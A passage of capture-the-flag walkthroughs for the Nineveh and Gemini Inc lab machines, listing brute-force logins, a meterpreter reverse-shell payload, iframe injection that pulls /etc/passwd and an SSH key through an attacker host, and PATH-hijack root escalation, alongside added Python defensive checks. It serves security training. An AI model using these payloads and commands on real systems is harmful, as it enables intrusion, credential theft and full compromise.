![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-XiHIwBiR390/WzM6xGEsukI/AAAAAAAAXkg/1XvXil9L2KgPuJDzwdWO1GGW5qVc0pL4QCEwYBhgL/s1600/3.png?w=687&ssl=1)
It put up a login page as shown here.
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-vRk_n8E8yFc/WzM6xZQ0mhI/AAAAAAAAXkw/Gic81oyjGfwwh0__IUev4poCRKZMmSv6wCEwYBhgL/s1600/4.png?w=687&ssl=1)
So we tried random combinations of username and password. When we entered username: admin and password: password it gave the error "Invalid Password", so it was clear that the username must be admin.
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-c8yuwofXWjU/WzM6xsYtPJI/AAAAAAAAXko/vn6_OXf4Rvsd_ljbQlXuw9QsUvAbs1RagCEwYBhgL/s1600/5.png?w=687&ssl=1)
Then with the help of Burp Suite we made a brute-force attack using the rockyou.txt file as the password dictionary. Thus we obtained the correct combination for login.
```
Username: admin
Password: 1q2w3e4r5t
```
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-esHvIAeQJNw/WzM6xqEuLKI/AAAAAAAAXks/i7ShXNK7Y-A3CFKlWAk1S6puyeoKfqyMgCEwYBhgL/s1600/6.png?w=687&ssl=1)
We used the above credentials to log in and got into the admin console as shown.
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/--02xkpAsrE0/WzM6yBY4tEI/AAAAAAAAXkw/jevr2nZbVZ4iMgjKLzbegTWPidEJeLY2gCEwYBhgL/s1600/8.png?w=687&ssl=1)
On the Notes tab we concluded that the text shown comes from a file stored somewhere on the system, named ninevehNotes.txt.
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-v7QFhos8yuM/WzM6yKFgL9I/AAAAAAAAXk0/owtwByv6oS8MXTRaAJ8-PdaxADl5hFInACEwYBhgL/s1600/9.png?w=687&ssl=1)
After that we also explored port 443 and observed the following web page. We also looked at its page source but didn't notice any further hint.
![[Image: 10.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-4OCN4j6LKzE/WzM6utoa1UI/AAAAAAAAXkc/l3sefF8FYVEui8hJSNDjbVx7aC6-VuQNQCEwYBhgL/s1600/10.png?w=687&ssl=1)
Therefore we again used the dirb tool for a directory brute-force attack and observed the /db directory.
```
dirb <URL elided in source> /usr/share/wordlists/dirb/big.txt
```
![[Image: 11.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-QQt3-SWKgJA/WzM6uArG0NI/AAAAAAAAXkc/5bkZ1-_yNcMpUPbhd6t3KtPJxW4EAyqgACEwYBhgL/s1600/11.png?w=687&ssl=1)
Exploiting
For a second time we explored the above-enumerated directory and observed a login page for phpLiteAdmin v1.9.
![[Image: 12.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-9LlfJ9Er_00/WzM6utTQq-I/AAAAAAAAXk0/OEdgDfPwrVAhENrw_YxZYy9D2E6gsyMvQCEwYBhgL/s1600/12.png?w=687&ssl=1)
Again we launched a brute force on the password field of /db with Burp Suite and got the password: password123.
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-lzGDkq0k4Xk/WzM6uqf0SvI/AAAAAAAAXkc/pdnlXioB8HU7h06ouxGQGAkxTrI2XSfwgCEwYBhgL/s1600/13.png?w=687&ssl=1)
Using password123 we got inside the phpLiteAdmin dashboard. Then with the help of Google we found the trick to exploit it, after reading the description of Exploit-DB 24044.
![[Image: 14.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/--0T2jGFpeFM/WzM6uxZyNII/AAAAAAAAXko/m---_vsYVGc9wLVulzd2f1CtazBUiulkACEwYBhgL/s1600/14.png?w=687&ssl=1)
Following the description from exploit 24044, we create a new database named "ninevehNotes.txt.shell.php".
![[Image: 15.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-AoSp9WWKkF0/WzM6vClYIBI/AAAAAAAAXkk/yO95oaZ-2Do5MrzAdW0fybcmASKx_4wuwCEwYBhgL/s1600/15.png?w=687&ssl=1)
Here we have created a new table "Demo" and added a field inside it.
![[Image: 16.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-dI4AAoB-4kc/WzM6vd7B8FI/AAAAAAAAXkc/UVxEOey3jrcR03_78lK2a1PzBZNONWviQCEwYBhgL/s1600/16.png?w=687&ssl=1)
Now create an entry in field 1 as shown.
![[Image: 17.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-HksTkjgPmpU/WzM6vUgs3mI/AAAAAAAAXks/kK61LOq-cJElH8L-SP5z7d3jrDELFRsNwCEwYBhgL/s1600/17.png?w=687&ssl=1)
Let's create a PHP payload to inject inside the new database. We use the msfvenom command to generate the PHP backdoor.
```
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.25 lport=4444 -f raw
```
Now copy the code from <?php … die(); and start the multi handler in a new terminal.
![[Image: 18.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-ZVGvJtSzJQQ/WzM6viMCJaI/AAAAAAAAXkk/u0vakgUP-uUDIL8YqS5cBJ66nNDIK-LIACEwYBhgL/s1600/18.png?w=687&ssl=1)
Go to the Insert tab and paste the above-copied code inside the text field given for Value.
![[Image: 19.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-CX0HbED1nUY/WzM6v2ol4SI/AAAAAAAAXko/TN3S2Z11sWIkrOAoWW29RbaGpO2kkMGtACEwYBhgL/s1600/19.png?w=687&ssl=1)
At last you will notice that /var/tmp/ninevehNotes.txt.shell.php is the path of your database.
![[Image: 20.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-DhAdprRCAg8/WzM6wEX8RnI/AAAAAAAAXkw/GyoeE9i11doXg5R3g4sIxxLUAk4CvsU8QCEwYBhgL/s1600/20.png?w=687&ssl=1)
If you remember, we had already accessed the admin console and observed a tab for Notes; use it to execute your backdoor (URL elided in the source).
![[Image: 22.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-S0fVdTdD5y8/WzM6wlB0pHI/AAAAAAAAXks/7EjN3tMFSGAMhxfnxyFZL1dNQM5B3LEWQCEwYBhgL/s1600/22.png?w=687&ssl=1)
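Both shells on this page work because the server ends up executing a file the attacker named with a PHP extension: `shell.php5` through the October CMS media manager above, and `ninevehNotes.txt.shell.php` through the phpLiteAdmin database name plus the Notes page include here. As an added example, not the code of either application, this is the server-side validation a defender would want: reject executable extensions anywhere in an uploaded filename, and resolve note names inside a fixed directory so that an absolute path such as /var/tmp/... is refused. The notes directory path is an assumption made for the example.

```python
import posixpath

# Extensions that PHP handlers in many Apache configurations treat as
# executable. The exact set depends on the server config (which is why the
# October upload worked with .php5), so the upload check rejects a broad set
# rather than just ".php".
EXECUTABLE_EXTS = {".php", ".php3", ".php4", ".php5", ".php7", ".phtml", ".phar"}

# Assumed directory the Notes page is allowed to read from (not from the page).
NOTES_ROOT = "/var/www/html/notes"


def has_executable_extension(filename: str) -> bool:
    """True if ANY dotted suffix of the base name is server-executable.

    Checking every suffix rather than only the last one rejects
    'ninevehNotes.txt.shell.php', 'shell.php5' and also 'x.php.txt', which
    Apache executes when the php handler is bound with AddHandler.
    """
    parts = posixpath.basename(filename).lower().split(".")
    return any("." + part in EXECUTABLE_EXTS for part in parts[1:])


def safe_upload_name(filename: str) -> bool:
    """Accept only a bare file name (no directory components) with no
    executable extension anywhere in it."""
    base = posixpath.basename(filename)
    return bool(base) and base == filename and not has_executable_extension(base)


def resolve_note_path(root: str, requested: str) -> str:
    """Resolve a user-supplied note name inside root.

    posixpath.join discards root when `requested` is absolute, and normpath
    collapses '..' segments; the prefix check afterwards catches both, so a
    request for '/var/tmp/ninevehNotes.txt.shell.php' or '../../etc/passwd'
    raises instead of being included.
    """
    candidate = posixpath.normpath(posixpath.join(root, requested))
    if candidate != root and not candidate.startswith(root + "/"):
        raise ValueError(f"path escapes notes root: {requested!r}")
    return candidate


if __name__ == "__main__":
    for name in ("profile.pdf", "shell.php5", "ninevehNotes.txt.shell.php", "../photo.jpg"):
        print(f"{name:30} upload allowed: {safe_upload_name(name)}")
    for req in ("ninevehNotes.txt", "/var/tmp/ninevehNotes.txt.shell.php", "../../etc/passwd"):
        try:
            print(f"{req:40} -> {resolve_note_path(NOTES_ROOT, req)}")
        except ValueError as err:
            print(f"{req:40} -> refused ({err})")
```

Extension filtering on its own is the weaker half: a server that stores uploads under a web root with PHP enabled will eventually execute something, so the usual pairing is this check plus an upload directory where the handler is disabled. The path check is what closes the Nineveh route specifically, since the database file lived outside the web root and was only reachable because the Notes page took an arbitrary path.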
Meanwhile, return to the Metasploit terminal and wait for the meterpreter session from the multi handler.
```
msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 10.10.14.25
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit
```
From the image given below you can observe meterpreter session 1. But the task is not finished yet; we still need to penetrate further for privilege escalation.
```
meterpreter > sysinfo
meterpreter > cd /home
meterpreter > ls
meterpreter > cd amrois
meterpreter > ls
meterpreter > cat user.txt
```
![[Image: 24.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-DkFnZjPf-D4/WzM6wyYNdTI/AAAAAAAAXko/IMmNe-JrP_ARAsFz7yfav_sWcUkuULOZgCEwYBhgL/s1600/24.png?w=687&ssl=1)
Privilege Escalation
After a little enumeration we noticed a directory named report owned by the user amrois, and these reports were being generated continuously by chkrootkit every minute.
With the help of Google we came to know that Metasploit contains an exploit for chkrootkit. We enter the following commands as shown in the image: load the exploit/unix/local/chkrootkit module, set session 1 and an arbitrary lport such as 4545, and run the module.
This gives another session; as you can see we have spawned a command shell on the target machine. Now if you check the uid by typing id it will show uid=0, i.e. root.
```
id
cd /root
```
And to see the list of files in /root, type:
```
ls -lsa
```
In the list you will see a text file; to read it, type:
```
cat root.txt
```
Congrats!! We hit the goal, finished both tasks and in the end obtained root access.
![[Image: 25.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-0JCv-i9CYyM/WzM6w1mKK5I/AAAAAAAAXkk/MY7aXtJYaIYzCetnCrz46b5lkGXvzmOWQCEwYBhgL/s1600/25.png?w=687&ssl=1)
Gemini Inc has contacted you to perform a penetration testing on one of their internal systems. This system has a web application that is meant for employees to export their profile to a PDF. Identify any vulnerabilities possible with the goal of complete system compromise with root privilege. To demonstrate the level of access obtained, please provide the content of flag.txt located in the root directory as proof.
Download link elided in the source.
Penetrating Methodologies
- Scanning (Nmap)
- Abusing web application for export injection vulnerability
- Exploit web application via html iframe
- Steal SSH RSA file
- Access tty shell through ssh login
- Enumerate file having SUID bit
- Privilege Escalation
- Get root shell
- Complete the task and capture the Flag.txt
To scan our target IP we will use an aggressive scan (-A) over all ports.
```
nmap -p- -A 192.168.1.103 --open
```
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-M-hFD0A53cc/WzHYq_Rt9_I/AAAAAAAAXhU/cO0OqYyNCAIwPynhBvs1xtINFIu5G_VsQCLcBGAs/s1600/1.png?w=687&ssl=1)
As a result, it found that ports 22 and 80 were open, and also found a directory /test2. When we explored the target IP in a web browser it put up the following web page.
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-_GumhUJ6n9M/WzHYs5kxF3I/AAAAAAAAXhs/zdBlJn0N6osew3x03-uKzDO45w-KEbMWQCEwYBhgL/s1600/2.png?w=687&ssl=1)
Then we explored /test2, where we read the following message for the admin; also take a look at the URL shown here.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-GSec7GT8PR4/WzHYtmdwmFI/AAAAAAAAXh8/F1Z3_IaoEeoLp3vQ08xjB7GzJkLvml3ZACEwYBhgL/s1600/3.png?w=687&ssl=1)
Then at the login form we tried guessing credentials for the admin console, and luckily on the 5th attempt we logged in successfully with the following credentials.
Username: admin
Password: 1234
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-CCHnAyVzIHM/WzHYuNz9-wI/AAAAAAAAXiA/vVllHjxWOzI5NvyPI17qcS2C99nNpjEQgCEwYBhgL/s1600/4.png?w=687&ssl=1)
After logging into the admin console successfully we checked the actions available to the administrator; it shows the following:
- Edit profile
- Export profile
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-fAlpxUvc5qc/WzHYuAlmizI/AAAAAAAAXiE/BsQUMlsR60YVO5L8imQ6kvSkXGD-eKVowCEwYBhgL/s1600/5.png?w=687&ssl=1)
So we executed export profile to observe what it actually exports, but could not figure it out from the output shown in the image below; therefore we decided to capture its request.
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-NU8n94qWZ5s/WzHYudYYslI/AAAAAAAAXik/0CCKH39PrAM5r43L8-fNQUAJtWbqcMUdACEwYBhgL/s1600/6.png?w=687&ssl=1)
Further, with the help of Burp Suite, we captured the browser request and sent the intercepted request to the Repeater. Here I saw that the export script generates the admin user's profile page as a PDF using a tool named wkhtmltopdf.
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-AAnPMbR1oAs/WzHYu37wlYI/AAAAAAAAXio/BpMAiUMwu8woec7Hju7q7QLgEqxPHCugACEwYBhgL/s1600/7.png?w=687&ssl=1)
If the web application does not filter user input, the server is exposed to several weaknesses. One of the most common exposures on the web is the ability to read an arbitrary file from the server. This is a critical security issue, as it gives an attacker the ability to retrieve sensitive information from the server, for example the /etc/passwd file.
We can abuse wkhtmltopdf to read such sensitive files. Here we have written the following index.php script, which redirects to any requested file.
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-8N9HGM69gME/WzHYvE6XybI/AAAAAAAAXis/0GIf8SZP-BIb786k1RQSMDZvFlrs7b3tQCEwYBhgL/s1600/8.png?w=687&ssl=1)
To serve it to the victim's machine we launch PHP's built-in web server for the file transfer.
php -S 0.0.0.0:4444
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-jn2KZAVNyZM/WzHYvXaiSBI/AAAAAAAAXiw/qmA1kqeAIZ0HQsNa4j8YqKL3X3HhBJnbwCEwYBhgL/s1600/9.png?w=687&ssl=1)
We got a hint for export injection from an external source, and on that basis we proceed with the following steps. Now go with Action -> edit profile.
Then inject the following HTML code into the text field given for the Display name:
<iframe height="1000" width="800" src="http://192.168.1.108:4444/?file=/etc/passwd"></iframe>
![[Image: 10.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-u5b0yu1XLqI/WzHYqxTPN6I/AAAAAAAAXic/7bX4LTxmcqEcZ62U1tELZAVDyqyp0621ACEwYBhgL/s1600/10.png?w=687&ssl=1)
Now go with Action -> export profile
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-wg6N3HxsI68/WzHYq-shNQI/AAAAAAAAXiY/x3xGEXWodOgbMfqIafDjaGyuCHSn6li9ACEwYBhgL/s1600/11.png?w=687&ssl=1)
TERRIFIC!!!! It met our expectation and we have the /etc/passwd file in front of us. Here we can clearly observe UID and GID 1000 for the user gemini1.
![[Image: 12.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-2Kid1vYoCZI/WzHYr_xzHWI/AAAAAAAAXis/mHiLtEI9Q3kJWBjc48F5pDfh8Y-XODThQCEwYBhgL/s1600/12.png?w=687&ssl=1)
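As an added defender's note (written in Python; the VM's application is PHP and this is not its code): the export bug exists because the Display name is concatenated unescaped into the HTML that wkhtmltopdf renders. Below, the vulnerable and hardened template builders sit side by side, together with the renderer switches that stop an injected frame or redirect from pulling file:// content into the PDF; `PAYLOAD` is the iframe string used above, and the function names are my own.

```python
import html
import re
import subprocess

# Constructed sample: the Display name payload injected in the walkthrough above.
PAYLOAD = ('<iframe height="1000" width="800" '
           'src="http://192.168.1.108:4444/?file=/etc/passwd"></iframe>')


def profile_html_vulnerable(display_name: str) -> str:
    """Mimics the flaw: user input lands verbatim in the HTML handed to the renderer."""
    return f"<html><body><h1>Profile of {display_name}</h1></body></html>"


def profile_html_hardened(display_name: str) -> str:
    """Fix 1: HTML-escape every user-controlled value, so '<' and quotes become
    inert text and no tag (iframe, object, link, script) can be smuggled in."""
    safe = html.escape(display_name, quote=True)
    return f"<html><body><h1>Profile of {safe}</h1></body></html>"


def wkhtmltopdf_command(html_path: str, pdf_path: str) -> list:
    """Fix 2: defence in depth at the renderer. Both switches are real wkhtmltopdf
    options: the first forbids reading local files during conversion (the file://
    redirect trick), the second removes script-driven navigation."""
    return ["wkhtmltopdf", "--disable-local-file-access", "--disable-javascript",
            html_path, pdf_path]


def contains_markup(value: str) -> bool:
    """Audit helper for already-stored profile fields: true if the value carries
    something that looks like an HTML tag (a bare '<' in prose does not match)."""
    return re.search(r"<\s*/?\s*[a-z][a-z0-9]*[\s>/]", value, re.I) is not None


def export_profile(display_name: str, html_path: str, pdf_path: str) -> None:
    """Write the escaped template and run the hardened renderer (needs wkhtmltopdf)."""
    with open(html_path, "w", encoding="utf-8") as fh:
        fh.write(profile_html_hardened(display_name))
    subprocess.run(wkhtmltopdf_command(html_path, pdf_path), check=True)


if __name__ == "__main__":
    print("vulnerable:", profile_html_vulnerable(PAYLOAD))
    print("hardened:  ", profile_html_hardened(PAYLOAD))
    print("command:   ", " ".join(wkhtmltopdf_command("profile.html", "profile.pdf")))
    print("stored value looks injected:", contains_markup(PAYLOAD))
```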
From the nmap scan result we had seen a hint about an SSH RSA key, and we also knew the first username of this VM, therefore let's try to export the RSA key file.
Now go with Action -> edit profile
Then inject the following HTML code into the text field given for the Display name:
<iframe height="1000" width="800" src="http://192.168.1.108:4444/?file=/home/gemini1/.ssh/id_rsa"></iframe>
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-Wgf1L6-t59Y/WzHYr5KImUI/AAAAAAAAXig/T_0vWOKw36EtX1Si8DwtPbPt2g3-l_jPACEwYBhgL/s1600/13.png?w=687&ssl=1)
Now go with Action -> export profile
Feeling incredible after observing the following result; download it quickly.
![[Image: 15.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-BEgBokHlFxs/WzHYsDDyWwI/AAAAAAAAXio/TgGbraBogRkKt7TFNeRvl6h185Oi9vXLQCEwYBhgL/s1600/15.png?w=687&ssl=1)
With the help of the downloaded RSA key file, connect to the victim's VM via ssh as gemini1.
ssh -i login_rsa gemini1@192.168.1.103
![[Image: 16.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-O3PXbAps5zc/WzHYs6bB2KI/AAAAAAAAXik/jzlVyUn07zka7KpySx1G5Ob6JLLCyV4RgCEwYBhgL/s1600/16.png?w=687&ssl=1)
Then, without wasting time, search for files with the SUID bit (4000 permission) using the find command for post-exploitation.
find / -perm -u=s -type f 2>/dev/null
Here we can also observe an interesting file, /usr/bin/listinfo, with SUID permission. After exploring this file we noticed that it probably runs netstat and date. Hence we can escalate privilege by abusing the environment PATH variable; you can refer to our article on that topic to know more about it.
![[Image: 17.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-DDPFEXTNxc0/WzHYtPc8fCI/AAAAAAAAXic/1bdFQTduSPQOW922HqdXUl9xgFPQ5d7EgCEwYBhgL/s1600/17.png?w=687&ssl=1)
cd /tmp
echo "/bin/sh" > date
chmod 777 date
echo $PATH
export PATH=/tmp:$PATH
/usr/bin/listinfo
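The escalation works only because listinfo calls date and netstat by bare name, so whatever is first in $PATH gets executed as root; the fix is to call helpers by absolute path (or reset PATH inside the binary). As an added audit script, not from the original walkthrough, the Python below reproduces the find step and then flags SUID binaries whose embedded strings name such commands without a leading slash. `WATCHED_COMMANDS` and the ELF-like sample in the test are constructed for illustration.

```python
import os
import stat
import sys

# Constructed list: commands a privileged helper such as /usr/bin/listinfo tends to shell out to.
WATCHED_COMMANDS = {"date", "netstat", "id", "ls", "cat", "ps", "ifconfig", "ip", "whoami"}


def find_suid_files(root="/"):
    """Equivalent of `find / -perm -u=s -type f`: yield regular files with the SUID bit."""
    for dirpath, _dirs, filenames in os.walk(root, onerror=lambda err: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path


def relative_command_refs(data: bytes, commands=WATCHED_COMMANDS):
    """Heuristic: split the file on NUL bytes (how C string literals are stored) and
    report watched commands that appear as the first word of a string without an
    absolute path, i.e. names that will be resolved through $PATH at run time.
    '/bin/date' is fine; 'date +%s' and 'netstat -antp' are not."""
    hits = set()
    for chunk in data.split(b"\0"):
        words = chunk.strip().split(None, 1)
        if not words:
            continue
        try:
            first = words[0].decode("ascii")
        except UnicodeDecodeError:
            continue
        if first in commands:
            hits.add(first)
    return sorted(hits)


def audit_suid_binary(path: str):
    """Return the $PATH-resolved command names found inside one SUID binary."""
    with open(path, "rb") as fh:
        return relative_command_refs(fh.read())


if __name__ == "__main__":
    scan_root = sys.argv[1] if len(sys.argv) > 1 else "/"
    for suid_path in find_suid_files(scan_root):
        refs = audit_suid_binary(suid_path)
        if refs:
            print(f"{suid_path}: runs {', '.join(refs)} via $PATH lookup")
```

Symbol names in an ELF string table can also match, so treat a hit as a lead to confirm with strace or a disassembler rather than as proof.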
As you can observe, after that we executed the id command and obtained the root id.
![[Image: 25.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-ruMb8O5P4lI/WzHYtae2qUI/AAAAAAAAXiw/1IFlibixFCoHPUwYat8aXm5k8qXK4XcLQCEwYBhgL/s1600/25.png?w=687&ssl=1)
Now let's finish this task by capturing flag.txt from inside the root directory.
cd root
ls
cat flag.txt
![[Image: 26.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-77UG680bV8s/WzHYtc5ZUSI/AAAAAAAAXig/Q6qBWLeicdULNzM7ZAVt1pLSO2C6QY2wACEwYBhgL/s1600/26.png?w=687&ssl=1)